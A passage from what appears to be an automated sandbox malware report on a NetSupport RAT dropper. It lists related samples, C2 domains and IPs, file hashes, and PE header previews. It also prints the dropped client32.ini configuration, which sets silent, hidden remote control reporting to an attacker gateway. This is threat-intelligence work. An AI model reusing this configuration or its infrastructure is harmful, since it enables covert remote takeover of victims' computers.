                                          XCIlhzFXdplpXdhQXCyywBkGlU.ps1Get hashmaliciousNetSupport RATBrowse
                                          • geo.netsupportsoftware.com/location/loca.asp
                                          tOUKLPvSz.ps1Get hashmaliciousNetSupport RATBrowse
                                          • geo.netsupportsoftware.com/location/loca.asp
                                          R6aeFGF7gU.exeGet hashmaliciousNetSupport RATBrowse
                                          • geo.netsupportsoftware.com/location/loca.asp
                                          37.1.209.225SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                          • http://37.1.209.225/fakeurl.htm
                                          SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                          • http://37.1.209.225/fakeurl.htm

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          geo.netsupportsoftware.comSecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                          • 104.26.1.231
                                          SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                          • 172.67.68.212
                                          upd_8707558.msixGet hashmaliciousNetSupport RATBrowse
                                          • 104.26.1.231
                                          8hN4C25a0O.exeGet hashmaliciousNetSupport RATBrowse
                                          • 172.67.68.212
                                          information_package.exeGet hashmaliciousNetSupport RAT, NetSupport Downloader, Stealc, VidarBrowse
                                          • 104.26.0.231
                                          Update.jsGet hashmaliciousNetSupport RATBrowse
                                          • 104.26.1.231
                                          FakturaPDF.exeGet hashmaliciousNetSupport RATBrowse
                                          • 104.26.1.231
                                          FakturaPDF.exeGet hashmaliciousNetSupport RATBrowse
                                          • 172.67.68.212
                                          armayalitim.comSecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                          • 37.1.209.225
                                          SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                          • 37.1.209.225
                                          mlm-cdn.comSecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                          • 142.11.212.184
                                          SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                          • 142.11.212.184
                                          SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                          • 142.11.212.184

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          HOSTWINDSUSSecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                          • 142.11.212.184
                                          SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                          • 142.11.212.184
                                          SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                          • 142.11.212.184
                                          Please sign this document - Signature requested by HR Notices.emlGet hashmaliciousHTMLPhisherBrowse
                                          • 142.11.211.206
                                          Brownsburg Fire Territory.pdfGet hashmaliciousUnknownBrowse
                                          • 192.236.147.242
                                          information_package.exeGet hashmaliciousNetSupport RAT, NetSupport Downloader, Stealc, VidarBrowse
                                          • 192.236.208.115
                                          https://www.qrcreator.com/qr/C9948D09Get hashmaliciousHTMLPhisherBrowse
                                          • 23.238.35.10
                                          https://www.qrcreator.com/qr/1CFCF746Get hashmaliciousPhisherBrowse
                                          • 23.238.35.10
                                          HVC-ASUSSecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                          • 37.1.209.225
                                          SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                          • 37.1.209.225
                                          kEwKRoptwZ.lnkGet hashmaliciousUnknownBrowse
                                          • 23.227.203.67
                                          KgrUaCcfSR.lnkGet hashmaliciousUnknownBrowse
                                          • 23.227.203.67
                                          MicrosoftEdge.msiGet hashmaliciousORPCBackdoorBrowse
                                          • 162.252.175.145
                                          MicrosoftEdge.msiGet hashmaliciousORPCBackdoorBrowse
                                          • 162.252.175.145
                                          https://funnelverse.com/wp-includes/css/americanexpress/nDw8DTGet hashmaliciousHTMLPhisherBrowse
                                          • 23.111.168.85
                                          https://sharepoint-office.anzsomasm2023.com.au/?YLBL3J=J5Get hashmaliciousHTMLPhisherBrowse
                                          • 23.227.196.112
                                          CLOUDFLARENETUSSecuriteInfo.com.Win32.PWSX-gen.29050.19153.exeGet hashmaliciousLummaCBrowse
                                          • 172.67.173.81
                                          SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exeGet hashmaliciousUnknownBrowse
                                          • 172.67.187.100
                                          SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exeGet hashmaliciousUnknownBrowse
                                          • 104.21.64.194
                                          SPW AW25 - PO.010 SMS.exeGet hashmaliciousAgentTeslaBrowse
                                          • 172.67.74.152
                                          SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exeGet hashmaliciousUnknownBrowse
                                          • 172.67.187.100
                                          SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exeGet hashmaliciousUnknownBrowse
                                          • 104.21.64.194
                                          SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                          • 104.26.1.231
                                          SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exeGet hashmaliciousUnknownBrowse
                                          • 104.21.64.194
                                          SPW AW25 - PO.010 SMS.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.26.13.205

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          37f463bf4616ecd445d4a1937da06e19SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                          • 142.11.212.184
                                          SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                          • 142.11.212.184
                                          SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                                          • 142.11.212.184
                                          SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                          • 142.11.212.184
                                          UpUZDmZZSa.docGet hashmaliciousUnknownBrowse
                                          • 142.11.212.184
                                          dns3BZKZ8b.docGet hashmaliciousUnknownBrowse
                                          • 142.11.212.184
                                          kP7FtdeE0f.docGet hashmaliciousUnknownBrowse
                                          • 142.11.212.184
                                          file.exeGet hashmaliciousVidarBrowse
                                          • 142.11.212.184

                                          Dropped Files

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          C:\Users\user\AppData\Local\MSOneDrive\AudioCapture.dllSecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                            SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                              SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                                Teams.exeGet hashmaliciousNetSupport RATBrowse
                                                  C:\Users\user\AppData\Local\MSOneDrive\HTCTL32.DLLSecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                                    SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\MSOneDrive\AudioCapture.dll

                                                      Download File
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):78840
                                                      Entropy (8bit):6.635830973981154
                                                      Encrypted:false
                                                      SSDEEP:1536:96Y+zbZm8/v/k957pyPkLDfORFMTlrSWqNj5CdnTrioQ+ywlj5CdnTXZQ+8iA:96Y+HQ8/3k9RppYFclrLqNj5CdnTrIwp
                                                      MD5:2A82792F7B45D537EDFE58EB758C1197
                                                      SHA1:A039182D4D1EF29C6D8C238F20F7B8218C28F90C
                                                      SHA-256:05AA13A6C1D18F691E552F04A996960917202A322D0DACFD330E553AD56978ED
                                                      SHA-512:C6C6799B386E0D6489D9346F1D403B03B9425572E7418A93A72C413A4B9413945AAF4EA97A7D7B65772E5E3F00CFF65F180F6FEF51A26D4FDC2FF063816B5386
                                                      Malicious:false
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\MSOneDrive\AudioCapture.dll, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Joe Sandbox View:
                                                      • Filename: SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe, Detection: malicious, Browse
                                                      • Filename: SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe, Detection: malicious, Browse
                                                      • Filename: SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe, Detection: malicious, Browse
                                                      • Filename: Teams.exe, Detection: malicious, Browse
                                                      Reputation:moderate, very likely benign file
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........\...........7......................:....................2......3......4....Rich...........................PE..L...gf.a...........!.....|...d......E1............0.......................... ......................................@...-...t...P.......h................O..........`..................................@...............(............................text....z.......|.................. ..`.rdata..m6.......8..................@..@.data...`...........................@....rsrc...h...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\MSOneDrive\HTCTL32.DLL

                                                      Download File
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):313552
                                                      Entropy (8bit):6.750063959044223
                                                      Encrypted:false
                                                      SSDEEP:6144:Jd0nVF1ZtRq6itu9i3uxUnNPhMKj8TwFIKhJ08fvF0dGhZUbol:JYZrokUnNPhMY8TwFIcJB0i
                                                      MD5:3EED18B47412D3F91A394AE880B56ED2
                                                      SHA1:1B521A3ED4A577A33CCE78EEE627AE02445694AB
                                                      SHA-256:13A17F2AD9288AAC8941D895251604BEB9524FA3C65C781197841EE15480A13F
                                                      SHA-512:835F35AF4FD241CAA8B6A639626B8762DB8525CCCEB43AFE8FFFC24DFFAD76CA10852A5A8E9FC114BFBF7D1DC1950130A67037FC09B63A74374517A1F5448990
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                      Joe Sandbox View:
                                                      • Filename: SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe, Detection: malicious, Browse
                                                      • Filename: SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe, Detection: malicious, Browse
                                                      Reputation:low
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f./.".A.".A.".A.9i.5.A.+..+.A.".@...A.9i...A.9i.X.A.9i.#.A.9i.#.A.9i.#.A.Rich".A.........................PE..L...!l>T...........!................V8.......................................@............@..........................c..1....W..d.......8......................../...................................>..@...............h............................text............................... ..`.rdata.............................@..@.data...lt...p...(...P..............@....rsrc...8............x..............@..@.reloc...0.......2..................@..B........................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\MSOneDrive\NSM.lic

                                                      Download File
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):262
                                                      Entropy (8bit):5.159412672243952
                                                      Encrypted:false
                                                      SSDEEP:6:O/oPuHk4xRPjwx35vydDKHMoEEjLgpW2MOzx7oUIXZNWYpPM/ioeU6a8l6i7s:X0ZR7wxDJjjqW2MORzaNBPM/ioeUH8lM
                                                      MD5:B9956282A0FED076ED083892E498AC69
                                                      SHA1:D14A665438385203283030A189FF6C5E7C4BF518
                                                      SHA-256:FCC6AFD664A8045BD61C398BE3C37A97536A199A48D277E11977F93868AE1ACC
                                                      SHA-512:7DAA09113C0E8A36C91CC6D657C65851A20DFF6B60AC3D2F40C5737C12C1613C553955F84D131BA2139959973FEF9FC616CA5E968CB16C25ACF2D4739EED87EB
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:1200..0x27aa3c3....; NetSupport License File...; Generated on 15:44 - 29/03/2014........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=DCVTTTUUEEW23..maxslaves=100000..os2=1..product=10..serial_no=NSM896597..shrink_wrap=0..transport=0..

                                                      C:\Users\user\AppData\Local\MSOneDrive\PCICHEK.DLL

                                                      Download File
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):28656
                                                      Entropy (8bit):6.972247952476263
                                                      Encrypted:false
                                                      SSDEEP:768:X52mBHj1XCdnJ8EriRGp9E+l/kaTj1XCdnJ8EZp9E+8iROA:JPBHj5CdnTrioQ+l/kaTj5CdnTZQ+8iX
                                                      MD5:E311935A26EE920D5B7176CFA469253C
                                                      SHA1:EDA6C815A02C4C91C9AACD819DC06E32ECECF8F0
                                                      SHA-256:0038AB626624FA2DF9F65DD5E310B1206A9CD4D8AB7E65FB091CC25F13EBD34E
                                                      SHA-512:48164E8841CFC91F4CBF4D3291D4F359518D081D9079A7995378F970E4085B534F4BAFC15B83F4824CC79B5A1E54457B879963589B1ACBCFE727A03EB3DFFD1C
                                                      Malicious:false
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\MSOneDrive\PCICHEK.DLL, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 2%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........V...V...V...9.b.R.....f.W...9.`.W...9.T.S...9.U.T..._.m._...V...1...9.P.Z...9.e.W...9.d.W...9.c.W...RichV...........PE..L......^...........!......................... ...............................`.......e....@.........................p#..r....!..P....@............... ...O...P......P ............................... ..@............ ..D............................text...*........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\MSOneDrive\PCICL32.DLL

                                                      Download File
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):3461200
                                                      Entropy (8bit):6.522430452238238
                                                      Encrypted:false
                                                      SSDEEP:49152:oMnz9yqTXur/eAtTAh8bWbxnwDnsT2kaOgkcwSENUv7O:oMnzIqTXuCAtUh8b5xggAS7zO
                                                      MD5:F782C24A376285C9B8A3A116175093F8
                                                      SHA1:B8FDB6E95C7313CF31F14A3A31CC334B56E6DF09
                                                      SHA-256:C7BAF1647F6FEF1B1A4231C9743F20F7A4B524CA4EB987A0ACBEEEF7E037D7E3
                                                      SHA-512:256385A6663DCF70A5A9A1B766D1F826760F07EFA9B9248047DC43D41F6A9F4DD56CA2B218C222EA1D441E2F7BA9BB114CDE6954827B9761EBB1F23BBA7AD1BB
                                                      Malicious:false
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\MSOneDrive\PCICL32.DLL, Author: Joe Security
                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\MSOneDrive\PCICL32.DLL, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........Yg=.8.n.8.n.8.nDv.n.8.n..n.8.n.N.n.8.n(..n.8.n..n.8.n.@.n.8.n.8.n.;.n.@.n.8.n.@.n.8.n..n.8.n..n.8.n..n.8.n..n.8.n..n.8.nRich.8.n........................PE..L.....(S...........!........................................................`5......~5.............................0.......$............'............4.P....@3.(.... ..............................p...@....................}..`....................text............................... ..`.rdata..............................@..@.data...(...........................@....tls.................j..............@....hhshare.............l..............@....rsrc....'.......(...n..............@..@.reloc.......@3.......2.............@..B........................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\MSOneDrive\TCCTL32.DLL

                                                      Download File
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):397176
                                                      Entropy (8bit):6.805828808723932
                                                      Encrypted:false
                                                      SSDEEP:12288:T63kUb4Rtmiqcn1gqjamCcmAPFdOKAeriUAb4yfytX:V5e+mCFEK6bffQX
                                                      MD5:E5C78D4F6A7A886BD5A19A5F9B654A09
                                                      SHA1:D38231380D37981BE65D0FA84E0001F4DDCC568C
                                                      SHA-256:198CA24C0EF0D879CF475DCA9E0858DA4220F8624AEDF815C76CF33D0316C2B4
                                                      SHA-512:E2BFD445B83A53B3F797EFBA4C8FF873CD99CF3B78D2CBDAF1005F09172DB21199E48E19268DD4056F9FF5EB7885CC9192FF7C49E79F8FBE8D69948920887683
                                                      Malicious:false
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\MSOneDrive\TCCTL32.DLL, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 7%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L....HwX...........!................w................................................(....@.............................o...T...x....0..@...............x)...@..\E..................................`d..@...............h............................text...,........................... ..`.rdata../...........................@..@.data...h............~..............@....rsrc...@....0......................@..@.reloc..$F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\MSOneDrive\UIManagerBrokerps.dll

                                                      Download File
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):10752
                                                      Entropy (8bit):4.761618125965725
                                                      Encrypted:false
                                                      SSDEEP:192:ZW2DrdP1nJc7ve+YIAW1CmfCwAGCBCnh/frjEcCZCW2n2WRQn:sve+YIAW1xeInxrAZCW2n2W
                                                      MD5:45B5D93521B7818CA11B2C7C9E8811A1
                                                      SHA1:AF78BE041408DA9CE79C63B547FDC1CC195CC08E
                                                      SHA-256:44619C9667DD6489DD6693EC07924AE0472BF82AEF9AD85608E988CDA97C2D67
                                                      SHA-512:E2B4805CB3071CD38B8ED88ACE2E8F5C7E0DFB3BCFE11BE3E755798D1637AA064557AE28B4E791F886D336BB7D9CA41599E17C928C9AD23AD5D52443AD548AF2
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........./.T.A_T.A_T.A_].._D.A_@.B^U.A_@.E^X.A_T.@_~.A_@.@^W.A_@.A^U.A_@.I^V.A_@.._U.A_@.C^U.A_RichT.A_................PE..L....w0............!................`........0...............................p............@A.........................!.......@.......P..@....................`..........T...........................0................@...............................text............................... ..`.data...`....0......................@....idata.......@......................@..@.rsrc...@....P......."..............@..@.reloc.......`.......(..............@..B........................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\MSOneDrive\WerEnc.dll

                                                      Download File
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):20632
                                                      Entropy (8bit):6.530792585357305
                                                      Encrypted:false
                                                      SSDEEP:384:vtWK+FI/U8Y02qfc6W4ZW0CtDBRJKgR1lDzV7:EK+gbcEtCt1PKY3V7
                                                      MD5:9EC373D2E9B1251B41277F334DB59609
                                                      SHA1:AC531A8E849F77AD89D433E11205D5DC33DD8EAB
                                                      SHA-256:CFBFB100B3F29F55EED75C3C7A503098EEC7C4070B63559F42EF30911FC7B16F
                                                      SHA-512:3E4475DE9EA35BC95EEBABBA4E91D9CD414AB1B6892D9E3596A3F4AE4EE00671E0BDF1A84E05095EA948A93DA9327833277EB00F2586894FF34BD754CBCA45BE
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=Jc.y+..y+..y+..pS..w+..m@..x+..m@..i+..y+.._+..m@..z+..m@..z+..m@..x+..m@..{+..m@..x+..m@..x+..Richy+..........PE..L....((.........."!................. .......0...............................p............@A........................0)..i....@.......P..(................"...`......0...T........................... ................@...............................text............................... ..`.data...L....0......................@....idata..`....@....... ..............@..@.rsrc...(....P.......&..............@..@.reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\MSOneDrive\client32.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):107376
                                                      Entropy (8bit):4.702402773520006
                                                      Encrypted:false
                                                      SSDEEP:384:rmXhuZ758V5+6j6Qa86Fkv2Wr120hZD4otVVtV6is:iEd8VZl6FhWr80/sotVVtV6is
                                                      MD5:F6ABEF857450C97EA74CD8F0EB9A8C0A
                                                      SHA1:A1ACDD10F5A8F8B086E293C6A60C53630AD319FB
                                                      SHA-256:DB0ACB4A3082EDC19CA9A78B059258EA36B4BE16EEE4F1172115FC83E693A903
                                                      SHA-512:B6A2196EBFA51BB3FB8FB2B95AD5275828AB5435FD859FC993E2B3ED92A74799FE1C8B178270F99C79432F39AA9DBC0090038F037FCB651AB75C14B18102671F
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9!..}@.}@.}@.t8E..@....~@.}@.x@....|@...).|@....|@.Rich}@.........................PE..L......Y.....................t...... ........ ....@..................................[....@..................................!..<....0...l...........z..p).......... ..T............................................ .. ............................text............................... ..`.rdata....... ......................@..@.rsrc....l...0...n..................@..@.reloc...............x..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\MSOneDrive\client32.ini

                                                      Download File
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):664
                                                      Entropy (8bit):5.426079899627146
                                                      Encrypted:false
                                                      SSDEEP:12:l7hqH+WX4Ba/vmZ7CVVePb2oGS+u8on4ekLvaCYubluGjI9vykBIYPGY:l7hqeV8uT/yrneruEvykBIKf
                                                      MD5:14F6EBED5E1176F17C18D00A2DC64B2E
                                                      SHA1:CB9C079373658CE098E1D07D4A2C997BF3141B4B
                                                      SHA-256:D4C1F00382F01ABBB3142EF6D9C3E51557D0CED12A52861D8C5DF44D1CE723AC
                                                      SHA-512:E5F24A695749D693E873EA60B8CAAFF5CB3B306887721E3F9F308AFE697FBA37F3A6226322AEDEBB46764D6BBBAF21DF44D4C6A02DB49B067437D7E7D0CCEAF9
                                                      Malicious:false
                                                      Preview:0xe77314c8....[Client].._present=1..DisableChatMenu=1..DisableDisconnect=1..DisableReplayMenu=1..DisableRequestHelp=1..SOS_RShift=0..DisableChat=1..Shared=1..ValidAddresses.TCP=*..silent=1..AlwaysOnTop=0..SOS_Alt=0..SysTray=0..UnloadMirrorOnDisconnect=0..AutoICFConfig=1..DisableMessage=1..SOS_LShift=0..Usernames=*..SecurityKey2=dgAAANFUHNynybuwpE8GRawoAgMA..Protocols=3....[_License]..quiet=1....[_Info]..Filename=C:\ProgramData\regid1996-09com.microsoft\client32-u.ini....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=armayalitim.com:443..GSK=HA;F?FCFHL>BBCEEHH:I<J?LED..Port=443..SecondaryGateway=armayalitim1722.com:443..SecondaryPort=443..

                                                      C:\Users\user\AppData\Local\MSOneDrive\dpnathlp.dll

                                                      Download File
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):8192
                                                      Entropy (8bit):4.3358588850360205
                                                      Encrypted:false
                                                      SSDEEP:96:ixLCTNklk4a+4a9Tcqn2jshq8PjAzIsEWRuWw1QR:ixmT4kJ+4Yu0PrAzKWRuW
                                                      MD5:FAEDA9B43E022ACD3B8462B222EEDC72
                                                      SHA1:9D81571936C9270600E54F7BCA210026F6ECD830
                                                      SHA-256:F0F847A5079F94ADFD5B224C05DDD4A5651C757B920B6C26E629993C7DD36951
                                                      SHA-512:5A351F6A59F148E7091B8EFFA5D5E59102AB4FC4BFC1374E19A8ADE57FC68BCE4467F5B9BE34F9A4AAF2DF85721EFBCCDE064803469FEBA2B06EA789681B0D4E
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d"...L...L...L..nO...L..nH...L...M...L..nM...L..nL...L..nE...L..n....L..nN...L.Rich..L.................PE..L...p..............!......................... ...............................`.......y....@A........................ ...C...L0..<....@.......................P..........T............................................0..H............................text...c........................... ..`.data...L.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\MSOneDrive\dpnhupnp.dll

                                                      Download File
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):8192
                                                      Entropy (8bit):4.3358588850360205
                                                      Encrypted:false
                                                      SSDEEP:96:ixLCTNklk4a+4a9Tcqn2jshq8PjAzIsEWRuWw1QR:ixmT4kJ+4Yu0PrAzKWRuW
                                                      MD5:FAEDA9B43E022ACD3B8462B222EEDC72
                                                      SHA1:9D81571936C9270600E54F7BCA210026F6ECD830
                                                      SHA-256:F0F847A5079F94ADFD5B224C05DDD4A5651C757B920B6C26E629993C7DD36951
                                                      SHA-512:5A351F6A59F148E7091B8EFFA5D5E59102AB4FC4BFC1374E19A8ADE57FC68BCE4467F5B9BE34F9A4AAF2DF85721EFBCCDE064803469FEBA2B06EA789681B0D4E
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d"...L...L...L..nO...L..nH...L...M...L..nM...L..nL...L..nE...L..n....L..nN...L.Rich..L.................PE..L...p..............!......................... ...............................`.......y....@A........................ ...C...L0..<....@.......................P..........T............................................0..H............................text...c........................... ..`.data...L.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\MSOneDrive\dpnlobby.dll

                                                      Download File
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):8192
                                                      Entropy (8bit):4.3358588850360205
                                                      Encrypted:false
                                                      SSDEEP:96:ixLCTNklk4a+4a9Tcqn2jshq8PjAzIsEWRuWw1QR:ixmT4kJ+4Yu0PrAzKWRuW
                                                      MD5:FAEDA9B43E022ACD3B8462B222EEDC72
                                                      SHA1:9D81571936C9270600E54F7BCA210026F6ECD830
                                                      SHA-256:F0F847A5079F94ADFD5B224C05DDD4A5651C757B920B6C26E629993C7DD36951
                                                      SHA-512:5A351F6A59F148E7091B8EFFA5D5E59102AB4FC4BFC1374E19A8ADE57FC68BCE4467F5B9BE34F9A4AAF2DF85721EFBCCDE064803469FEBA2B06EA789681B0D4E
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d"...L...L...L..nO...L..nH...L...M...L..nM...L..nL...L..nE...L..n....L..nN...L.Rich..L.................PE..L...p..............!......................... ...............................`.......y....@A........................ ...C...L0..<....@.......................P..........T............................................0..H............................text...c........................... ..`.data...L.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\MSOneDrive\dxmasf.dll

                                                      Download File
